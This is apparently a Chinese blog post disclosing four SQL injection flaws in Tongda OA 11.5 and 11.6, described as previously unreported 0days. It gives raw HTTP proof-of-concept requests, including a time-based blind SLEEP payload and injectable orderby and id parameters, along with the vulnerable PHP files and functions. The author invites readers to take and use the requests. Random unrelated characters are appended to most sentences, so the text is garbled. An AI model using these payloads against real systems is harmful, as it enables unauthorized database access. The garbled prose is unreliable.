HW被暫停了五续，沒事看看審計(jì)，審了一些漏洞出來了樊卓，做一個(gè)分享哈。

影響范圍:

通達(dá)OA <= 11.5杠河、11.6版本（2020年04月17日發(fā)布了最新11.5版本也受影響）碌尔。

image.png

HW這幾天看到大家對通達(dá)OA的熱情度很高赶掖，正好今天有空，下載了一個(gè)通達(dá)OA 11.5版本下來做代碼審計(jì)七扰，通達(dá)OA的代碼是加密的，所以需要一個(gè)SeayDzend工具解密陪白，百度上就能找到颈走。

image.png

解密后，對代碼的各個(gè)模塊都大致看了一下咱士，很快就發(fā)現(xiàn)多處都存在SQL注入漏洞立由，仔細(xì)看了之前的曝光的文章，發(fā)現(xiàn)這些漏洞并未曝光序厉，也未預(yù)警锐膜，也屬于0day漏洞吧。
不多說弛房，直接上POC道盏，有需要的可以先拿到用了。

0x01 SQL注入 POC:

漏洞參數(shù)：starttime

POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/portal/home/
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Connection: keep-alive
Host: 192.168.43.169
Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 154
X-WVS-ID: Acunetix-Autologin/65535
Cache-Control: no-cache
Accept: */*
Origin: http://192.168.43.169
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1

image.png

漏洞文件：webroot\general\appbuilder\modules\calendar\models\Calendar.php文捶。
get_callist_data函數(shù)接收傳入的begin_date變量未經(jīng)過濾直接拼接在查詢語句中造成注入荷逞。

image.png

利用條件：
一枚普通賬號登錄權(quán)限，但測試發(fā)現(xiàn)粹排，某些低版本也無需登錄也可注入种远。

0x02 SQL注入 POC:

漏洞參數(shù)：orderby

GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.43.169/
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: 192.168.43.169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close

image.png

漏洞文件：webroot\inc\utility_email.php，get_sentbox_data函數(shù)接收傳入?yún)?shù)未過濾顽耳，直接拼接在order by后面了造成注入坠敷。

image.png

利用條件：
一枚普通賬號登錄權(quán)限，但測試發(fā)現(xiàn)射富，某些低版本也無需登錄也可注入膝迎。

0x03 SQL注入 POC:

漏洞參數(shù)：orderby

GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.43.169
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: 192.168.43.169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close

image.png

image.png

漏洞文件：webroot\inc\utility_email.php，get_email_data函數(shù)傳入?yún)?shù)未過濾胰耗，直接拼接在order by后面了造成注入弄抬。

image.png

利用條件：
一枚普通賬號登錄權(quán)限，但測試發(fā)現(xiàn)宪郊，某些低版本也無需登錄也可注入掂恕。
0x04 SQL注入 POC:
漏洞參數(shù)：id

GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.43.169
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: 192.168.43.169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close

image.png

image.png

漏洞文件：
webroot\general\appbuilder\modules\report\controllers\RepdetailController.php，actionEdit函數(shù)中存在 一個(gè)$_GET["id"]; 未經(jīng)過濾弛槐，拼接到SQL查詢中懊亡，造成了SQL注入。

image.png

利用條件：
一枚普通賬號登錄權(quán)限乎串，但測試發(fā)現(xiàn)店枣，某些低版本也無需登錄也可注入。